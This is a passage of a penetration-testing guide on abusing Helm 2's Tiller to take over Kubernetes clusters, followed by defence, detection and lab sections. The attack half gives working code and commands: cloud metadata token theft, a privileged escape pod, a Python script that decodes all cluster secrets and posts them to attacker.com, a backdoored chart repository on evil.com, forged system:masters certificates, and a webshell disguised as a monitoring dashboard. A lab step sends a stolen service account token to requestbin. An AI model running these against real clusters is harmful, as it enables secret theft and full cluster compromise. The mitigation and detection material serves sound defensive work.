aws ec2 describe-instances
```

**AKS (Azure Kubernetes Service):**

```bash
# Get Azure MSI token
curl -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Use token to access Azure resources
curl -H "Authorization: Bearer $AZURE_TOKEN" \
  https://management.azure.com/subscriptions?api-version=2020-01-01
```

#### 2. Container Escape via Privileged Pod

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
  namespace: default
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
    - name: escape
      image: ubuntu:latest
      command: ["/bin/bash", "-c", "sleep 3600"]
      securityContext:
        privileged: true
      volumeMounts:
        - name: host-root
          mountPath: /host
  volumes:
    - name: host-root
      hostPath:
        path: /
        type: Directory
```

**Deploy via Helm:**

```bash
/tmp/helm install ./escape-chart --name escape
```

**Execute escape:**

```bash
# Get shell in privileged pod
kubectl exec -it escape-pod -- /bin/bash

# Now on node filesystem
chroot /host

# You're now root on the node!
```

#### 3. Secret Exfiltration at Scale

```python
#!/usr/bin/env python3
"""
Extract and exfiltrate all Kubernetes secrets
"""
import base64
import json
import requests
import subprocess

def get_all_secrets():
    """
    Use kubectl to get all secrets
    """
    cmd = ["kubectl", "get", "secrets", "--all-namespaces", "-o", "json"]
    result = subprocess.run(cmd, capture_output=True, text=True)
    
    if result.returncode != 0:
        print(f"[-] Error: {result.stderr}")
        return None
    
    return json.loads(result.stdout)

def decode_secrets(secrets_json):
    """
    Decode base64-encoded secret values
    """
    decoded = []
    
    for item in secrets_json.get('items', []):
        namespace = item['metadata']['namespace']
        name = item['metadata']['name']
        secret_type = item['type']
        data = item.get('data', {})
        
        decoded_data = {}
        for key, value in data.items():
            try:
                decoded_data[key] = base64.b64decode(value).decode('utf-8')
            except Exception as e:
                decoded_data[key] = f"<decode_error: {e}>"
        
        decoded.append({
            'namespace': namespace,
            'name': name,
            'type': secret_type,
            'data': decoded_data
        })
    
    return decoded

def exfiltrate(data, url):
    """
    POST secrets to exfil server
    """
    try:
        response = requests.post(
            url,
            json=data,
            headers={'Content-Type': 'application/json'}
        )
        print(f"[+] Exfiltrated {len(data)} secrets")
        return response.status_code == 200
    except Exception as e:
        print(f"[-] Exfiltration failed: {e}")
        return False

if __name__ == "__main__":
    print("[*] Extracting all secrets...")
    secrets = get_all_secrets()
    
    if secrets:
        print(f"[+] Found {len(secrets.get('items', []))} secrets")
        
        decoded = decode_secrets(secrets)
        
        # Exfiltrate
        exfiltrate(decoded, "https://attacker.com/dump")
```

#### 4. Namespace Takeover

```yaml
# Create admin in target namespace
apiVersion: v1
kind: ServiceAccount
metadata:
  name: namespace-admin
  namespace: {{ .Values.targetNamespace }}
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: namespace-admin
  namespace: {{ .Values.targetNamespace }}
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: admin
subjects:
  - kind: ServiceAccount
    name: namespace-admin
    namespace: {{ .Values.targetNamespace }}
```

**Deploy:**

```bash
/tmp/helm install ./namespace-takeover \
  --name takeover-prod \
  --set targetNamespace=production
```

#### 5. Supply Chain Attack via Chart Repository

```bash
# Add malicious chart repository
/tmp/helm repo add malicious https://evil.com/charts

# Create malicious chart that gets installed by others
cat > Chart.yaml <<EOF
apiVersion: v1
name: innocuous-app
version: 1.0.0
description: A normal looking application
EOF

# Package with backdoor
helm package .

# Generate the index.yaml that chart clients fetch
helm repo index . --url https://evil.com/charts

# Upload the chart archive and index.yaml to the public repository
# When users install, backdoor is deployed
```

***

## Kubernetes API Takeover

#### 1. External API Access with Stolen Token

**GKE Example:**

```bash
# Get external endpoint
MASTER_IP=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | \
  grep KUBERNETES_MASTER_NAME | awk '{print $2}')

# Configure kubectl
kubectl config set-cluster pwned-gke \
  --server=https://$MASTER_IP \
  --insecure-skip-tls-verify=true

kubectl config set-credentials tiller \
  --token=$TILLER_TOKEN

kubectl config set-context pwned-gke \
  --cluster=pwned-gke \
  --user=tiller

kubectl config use-context pwned-gke

# Full cluster access from anywhere!
kubectl get nodes
```
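Before configuring kubectl it is worth confirming which identity a stolen token actually carries: service account tokens are JWTs whose payload names the account in the `sub` claim. A stdlib-only sketch (the token below is fabricated for illustration; no signature verification is performed):

```python
import base64
import json

def jwt_payload(token):
    """Decode the (unverified) payload segment of a JWT."""
    payload_b64 = token.split('.')[1]
    payload_b64 += '=' * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Fabricated token: header.payload.signature
claims = {'sub': 'system:serviceaccount:kube-system:tiller'}
fake_token = 'e30.' + base64.urlsafe_b64encode(
    json.dumps(claims).encode()).decode().rstrip('=') + '.sig'

print(jwt_payload(fake_token)['sub'])
# system:serviceaccount:kube-system:tiller
```

A `sub` of `system:serviceaccount:kube-system:tiller` confirms the token belongs to the Tiller service account before you burn it against the API server.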

#### 2. Creating Persistent Admin Users

```bash
# Create certificate for new admin
openssl genrsa -out admin.key 2048
openssl req -new -key admin.key -out admin.csr -subj "/CN=admin/O=system:masters"

# Sign with cluster CA (requires cluster-admin access)
kubectl get configmap -n kube-system kube-root-ca.crt -o jsonpath='{.data.ca\.crt}' > ca.crt
kubectl get secret -n kube-system <ca-key-secret> -o jsonpath='{.data.ca-key}' | base64 -d > ca.key

openssl x509 -req -in admin.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out admin.crt -days 365

# Configure kubectl with certificate
kubectl config set-credentials admin \
  --client-certificate=admin.crt \
  --client-key=admin.key

kubectl config set-context admin \
  --cluster=<cluster> \
  --user=admin
```
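This works because the API server maps the certificate subject's CN to a Kubernetes username and every O to a group, and the `system:masters` group is hard-wired to cluster-admin. A tiny parser (hypothetical helper, purely illustrative) makes the mapping explicit:

```python
def identity_from_subj(subj):
    """Derive the Kubernetes identity from an openssl -subj string:
    CN becomes the username, each O becomes a group."""
    fields = [part.split('=', 1) for part in subj.strip('/').split('/')]
    return {
        'user': next(v for k, v in fields if k == 'CN'),
        'groups': [v for k, v in fields if k == 'O'],
    }

print(identity_from_subj("/CN=admin/O=system:masters"))
# {'user': 'admin', 'groups': ['system:masters']}
```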

#### 3. Deploying WebShell for Persistent Access

```yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: monitoring-dashboard
  namespace: kube-system
spec:
  replicas: 1
  selector:
    matchLabels:
      app: monitoring
  template:
    metadata:
      labels:
        app: monitoring
    spec:
      serviceAccountName: tiller
      containers:
        - name: dashboard
          image: <your-webshell-image>
          ports:
            - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: monitoring-dashboard
  namespace: kube-system
spec:
  type: LoadBalancer
  ports:
    - port: 8080
      targetPort: 8080
  selector:
    app: monitoring
```

Access via: `http://<external-ip>:8080`

***

## Defense & Mitigation

#### 1. Immediate Actions

**If Tiller is Discovered:**

```bash
# Delete Tiller deployment
kubectl delete deployment tiller-deploy -n kube-system

# Delete Tiller service
kubectl delete service tiller-deploy -n kube-system

# Delete service account
kubectl delete serviceaccount tiller -n kube-system

# Delete cluster role binding
kubectl delete clusterrolebinding tiller

# Verify deletion
kubectl get all -n kube-system | grep tiller
```

#### 2. Upgrade to Helm 3

**Migration Process:**

```bash
# Install Helm 3
curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash

# Install 2to3 plugin
helm3 plugin install https://github.com/helm/helm-2to3

# Migrate configuration
helm3 2to3 move config

# Migrate releases
helm3 2to3 convert <release-name>

# Cleanup Helm 2
helm3 2to3 cleanup
```
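After migration, release state moves from Helm 2's ConfigMaps in kube-system to namespaced Secrets named `sh.helm.release.v1.<release>.v<revision>`. One way to sanity-check the result is to parse those Secret names (a sketch assuming that naming scheme):

```python
import re

def parse_release_secret(name):
    """Extract (release, revision) from a Helm 3 release Secret name."""
    m = re.fullmatch(r'sh\.helm\.release\.v1\.(.+)\.v(\d+)', name)
    return (m.group(1), int(m.group(2))) if m else None

print(parse_release_secret('sh.helm.release.v1.myblog.v3'))
# ('myblog', 3)
```

Listing Secrets of type `helm.sh/release.v1` in each namespace and feeding the names through this parser shows which releases (and how many revisions) survived the conversion.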

**Helm 3 Advantages:**

* No Tiller component
* Uses user's kubectl credentials and RBAC
* Namespaced releases
* Three-way strategic merge patches
* Improved chart dependency management

#### 3. Securing Helm 2 (if migration not possible)

**Enable mTLS Authentication:**

```bash
# Generate CA (the -subj CNs are placeholders; adjust to taste)
openssl genrsa -out ca.key 2048
openssl req -x509 -new -nodes -key ca.key -sha256 -days 1024 -out ca.crt -subj "/CN=tiller-ca"

# Generate Tiller certificate
openssl genrsa -out tiller.key 2048
openssl req -new -key tiller.key -out tiller.csr -subj "/CN=tiller-server"
openssl x509 -req -in tiller.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out tiller.crt -days 365

# Install Tiller with TLS
helm init \
  --service-account tiller \
  --tiller-tls \
  --tiller-tls-cert ./tiller.crt \
  --tiller-tls-key ./tiller.key \
  --tiller-tls-verify \
  --tls-ca-cert ca.crt

# Client must use TLS
helm list --tls
```

**Restrict Tiller Permissions:**

```yaml
# Create namespace-specific role
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: tiller-role
  namespace: my-namespace
rules:
  - apiGroups: ["", "apps", "extensions"]
    resources: ["*"]
    verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: tiller-binding
  namespace: my-namespace
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: tiller-role
subjects:
  - kind: ServiceAccount
    name: tiller
    namespace: my-namespace
```

#### 4. Network Security

**Implement Network Policies:**

```yaml
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-tiller
  namespace: kube-system
spec:
  podSelector:
    matchLabels:
      app: helm
      name: tiller
  policyTypes:
    - Ingress
  ingress:
    - from:
      # Only allow from specific namespaces
      - namespaceSelector:
          matchLabels:
            trusted: "true"
      ports:
        - protocol: TCP
          port: 44134
```
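The policy above admits TCP/44134 traffic only from namespaces labeled `trusted: "true"`. The `matchLabels` evaluation the network-policy controller performs is a simple subset check, sketched here for illustration (not the actual controller code):

```python
def matches(selector_labels, namespace_labels):
    """matchLabels semantics: every selector pair must appear on the namespace."""
    return all(namespace_labels.get(k) == v
               for k, v in selector_labels.items())

selector = {'trusted': 'true'}
print(matches(selector, {'trusted': 'true', 'team': 'platform'}))  # True
print(matches(selector, {'team': 'dev'}))                          # False
```

Any pod in an unlabeled namespace, including a compromised one, is denied the Tiller port once this policy is in place.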

**Block Port 44134 at Firewall:**

```bash
# iptables
iptables -A INPUT -p tcp --dport 44134 -j DROP

# GCP
gcloud compute firewall-rules create deny-tiller \
  --direction=INGRESS \
  --action=DENY \
  --rules=tcp:44134

# AWS (security groups are default-deny, so revoke any rule that allows 44134)
aws ec2 revoke-security-group-ingress \
  --group-id sg-xxxxx \
  --protocol tcp \
  --port 44134 \
  --cidr 0.0.0.0/0
```

#### 5. Detection & Monitoring

**Audit Helm Operations:**

```yaml
# Kubernetes audit policy
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  - level: RequestResponse
    verbs: ["create", "update", "patch", "delete"]
    resources:
      - group: ""
        resources: ["pods", "services"]
    namespaces: ["kube-system"]
```

**Monitor Tiller Connections:**

```bash
# Watch Tiller pod logs
kubectl logs -f deployment/tiller-deploy -n kube-system

# Monitor connections
kubectl exec -n kube-system <tiller-pod> -- netstat -an | grep 44134

# Prometheus query for Tiller metrics
sum(rate(tiller_requests_total[5m])) by (verb)
```

**Falco Rules for Tiller Exploitation:**

```yaml
- rule: Helm Chart Installed with Elevated Privileges
  desc: Detect Helm charts creating cluster-admin resources
  condition: >
    ka.verb=create and
    ka.target.namespace=kube-system and
    (ka.target.resource=clusterrolebindings or ka.target.resource=clusterroles) and
    ka.req.binding.role=cluster-admin
  output: >
    Privileged Helm chart installed
    (user=%ka.user.name ns=%ka.target.namespace resource=%ka.target.resource)
  priority: CRITICAL
```

#### 6. Best Practices

**Security Checklist:**

* \[ ] **Upgrade to Helm 3** (no Tiller)
* \[ ] **If Helm 2 required**, enable mTLS
* \[ ] **Restrict RBAC permissions** (no cluster-admin)
* \[ ] **Implement NetworkPolicies**
* \[ ] **Enable audit logging**
* \[ ] **Monitor Tiller activity**
* \[ ] **Regular security scans**
* \[ ] **Namespace isolation**
* \[ ] **Pod Security Policies/Pod Security Standards**
* \[ ] **Regular reviews of ClusterRoleBindings**

***

## Practical Lab Scenarios

#### Lab 1: Setting Up Vulnerable Environment

```bash
# Create test cluster (GKE example)
gcloud container clusters create vuln-cluster \
  --zone us-central1-a \
  --num-nodes 3

# Get credentials
gcloud container clusters get-credentials vuln-cluster

# Install Helm 2 with vulnerable config
kubectl create serviceaccount tiller -n kube-system

kubectl create clusterrolebinding tiller \
  --clusterrole=cluster-admin \
  --serviceaccount=kube-system:tiller

helm init --service-account tiller

# Verify Tiller is running
kubectl get pods -n kube-system | grep tiller
```

#### Lab 2: Exploitation Exercise

```bash
# Deploy victim application
helm install stable/wordpress --name myblog

# Compromise pod (simulate)
POD=$(kubectl get pods -l app=wordpress -o jsonpath='{.items[0].metadata.name}')
kubectl exec -it $POD -- /bin/bash

# Inside pod: Discover and exploit Tiller
export HELM_VERSION=v2.17.0
curl -L "https://get.helm.sh/helm-${HELM_VERSION}-linux-amd64.tar.gz" | \
  tar xz --strip-components=1 -C /tmp linux-amd64/helm

export HELM_HOST=tiller-deploy.kube-system:44134
export HELM_HOME=/tmp/helmhome
/tmp/helm init --client-only

# Verify access
/tmp/helm list

# Deploy privilege escalation
git clone https://github.com/ropnop/pentest_charts
/tmp/helm install pentest_charts/charts/exfil_sa_token \
  --name pwn \
  --set serviceAccountName=tiller \
  --set exfilURL=http://requestbin.net/xxxxx
```

#### Lab 3: Detection Exercise

```bash
# Enable audit logging
# (Edit API server manifest)

# Deploy Falco (Helm 2 syntax, matching this lab's Tiller setup)
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm install falcosecurity/falco --name falco --namespace falco \
  --set falco.grpc.enabled=true

# Monitor for Tiller abuse
kubectl logs -f daemonset/falco -n falco

# Generate alert by deploying malicious chart
helm install ./malicious-chart --name test
```

#### Lab 4: Remediation Exercise

```bash
# Remove Tiller
kubectl delete deployment tiller-deploy -n kube-system
kubectl delete service tiller-deploy -n kube-system
kubectl delete serviceaccount tiller -n kube-system

# Migrate to Helm 3
helm3 plugin install https://github.com/helm/helm-2to3
helm3 2to3 move config
helm3 2to3 convert <release-name>
helm3 2to3 cleanup

# Verify no Tiller remains
kubectl get all -n kube-system | grep -i tiller
```

***

### Conclusion

Helm Tiller represents a critical security vulnerability in Kubernetes environments. The combination of unauthenticated gRPC access, cluster-admin privileges, and network accessibility creates a perfect storm for privilege escalation attacks. While Helm 3 has eliminated Tiller, legacy deployments remain widespread and vulnerable.

**Key Takeaways:**

1. **Tiller = Instant Cluster Admin** - Any pod compromise leads to full cluster takeover
2. **No Authentication = No Security** - Default configs are completely insecure
3. **Upgrade to Helm 3** - Eliminates the entire attack surface
4. **Defense in Depth** - Network policies, RBAC, and monitoring are essential
5. **Regular Audits** - Check for Tiller in all Kubernetes clusters

**For Pentesters:**

* Always check for Tiller (port 44134) in Kubernetes assessments
* Use ropnop's pentest\_charts for efficient exploitation
* Document the complete attack chain: discovery → exploitation → privilege escalation
* Demonstrate business impact with realistic attack scenarios

**For Defenders:**

* Eliminate Tiller immediately if found
* Migrate to Helm 3 as soon as possible
* If Helm 2 required, implement mTLS and RBAC restrictions
* Monitor for suspicious chart deployments
* Regular security assessments of Kubernetes clusters

***

### Additional Resources

#### Tools

* [ropnop/pentest\_charts](https://github.com/ropnop/pentest_charts) - Helm charts for exploitation
* [munnerz/helmsploit](https://github.com/munnerz/helmsploit) - Simple privilege escalation demo
* [Helm 2to3 Plugin](https://github.com/helm/helm-2to3) - Migration tool

#### Research & Writeups

* [Attacking Default Installs of Helm on Kubernetes](https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/) - ropnop
* [Helm Tiller Security](https://engineering.bitnami.com/articles/helm-security.html) - Bitnami
* [Securing Helm](https://helm.sh/docs/topics/securing_installation/) - Official Documentation


